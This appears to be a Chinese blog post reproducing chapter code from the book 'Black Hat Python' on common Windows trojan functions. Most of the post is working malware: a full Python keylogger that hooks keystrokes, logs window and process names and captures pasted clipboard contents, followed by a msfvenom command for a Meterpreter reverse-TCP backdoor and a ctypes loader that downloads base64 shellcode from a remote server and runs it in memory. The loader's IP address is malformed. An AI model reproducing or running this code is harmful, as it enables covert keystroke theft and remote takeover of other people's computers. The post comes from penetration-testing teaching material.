《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

时间:2021-02-02 18:11:46

有趣的键盘记录

#coding=utf-8

from ctypes import *

import pythoncom

import pyHook

import win32clipboard

user32 = windll.user32

kernel32 = windll.kernel32

psapi = windll.psapi

current_window = None

def get_current_process():

    #获得前台窗口的句柄

    hwnd = user32.GetForegroundWindow()

    #获得进程ID

    pid = c_ulong(0)

    user32.GetWindowThreadProcessId(hwnd,byref(pid))

    #保存当前的进程ID

    process_id = "%d"%pid.value

    #申请内存

    executable = create_string_buffer("\x00"*512)

    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

    #读取窗口标题

    window_title = create_string_buffer("\x00"*512)

    length = user32.GetWindowTextA(hwnd,byref(window_title),512)

    #输出进程相关的信息

    print("[ PID: %s - %s - %s ]"%(process_id,executable.value,window_title.value))

    #关闭句柄

    kernel32.CloseHandle(hwnd)

    kernel32.CloseHandle(h_process)

def KeyStroke(event):

    global current_window

    #检测目标是否切换了窗口

    if event.WindowName != current_window:

        current_window = event.WindowName

        get_current_process()

    #检测按键是否为常规按键(非组合键等)

    if event.Ascii > 32 and event.Ascii <127:

        print chr(event.Ascii)

    else:

        #如果是输入为[Ctrl-V],则获得剪切板的内容

        if event.Key == "V":

            win32clipboard.OpenClipboard()

            pasted_value = win32clipboard.GetClipboardData()

            win32clipboard.CloseClipboard()

            print "[PASTE] - %s"%(pasted_value),

        else:

            print "[%s]"%event.Key,

    #返回直到下一个钩子事件被触发

    return True

#创建和注册钩子函数管理器

k1 = pyHook.HookManager()

k1.KeyDown = KeyStroke

#注册键盘记录的钩子,然后永久执行

k1.HookKeyboard()

pythoncom.PumpMessages()

Python的shellcode执行

先在Kali Linux中生成32位Windows的后门shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.160 LPORT=1234 -f raw -o win_backdoor.raw

接着开启Metasploit进行监听反弹的shell,将shellcode进行base64编码并利用SimpleHTTPServer模块将/tmp目录作为Web服务根目录并建立Web服务器:

base64 -i win_backdoor.raw > shellcode.bin

python -m SimpleHTTPServer

最后,运行一下代码即可:

#coding=utf-8

import urllib2

import ctypes

import base64

#从我们的Web服务器上下载shellcode

url = "http://192.1681.10:8000/shellcode.bin"

response = urllib2.urlopen(url)

#base64解码shellcode

shellcode = base64.b64decode(response.read())

#申请内存空间

shellcode_buffer = ctypes.create_string_buffer(shellcode,len(shellcode))

#创建shellcode的函数指针

shellcode_func = ctypes.cast(shellcode_buffer,ctypes.CFUNCTYPE(ctypes.c_void_p))

#执行shellcode

shellcode_func()

即可完成远程下载并加载shellcode上线

相关文章